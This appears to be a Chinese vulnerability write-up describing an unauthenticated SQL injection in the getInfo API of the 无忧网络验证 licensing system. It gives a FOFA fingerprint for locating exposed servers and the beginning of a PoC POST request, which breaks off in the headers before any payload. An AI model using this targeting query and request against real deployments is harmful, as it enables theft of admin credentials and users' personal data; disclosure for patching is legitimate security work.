无忧网络身份验证系统 getInfo SQL 注入漏洞再次发生

0x01 产品简介

无忧网络验证是一套安全稳定高效的网络验证系统，基于统一核心的通用互联网+信息化服务解决方案，是为软件作者设计的一套完整免费的网络验证体系。可以为开发的软件增加收费授权的功能,让作者开发的软件可以进行销售、充值、登陆等操作,并且提供防破解验证功能,可以更好的保护您的作品。同时增加了一系列代理管理机制,让您更好的管理代理售卡、换卡、结算等操作。

0x02 漏洞概述

无忧网络验证系统 /index.php/api/Software/getInfo接口处存在 SQL注入漏洞，未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息（例如管理员后台密码、站点用户个人信息）之外，攻击者甚至可以在高权限下向服务器写入命令，进一步获取服务器系统权限。

0x03 复现环境

FOFA：body="zhuya/js/base.js"

0x04 漏洞复现

PoC

POST /index.php/api/Software/getInfo HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;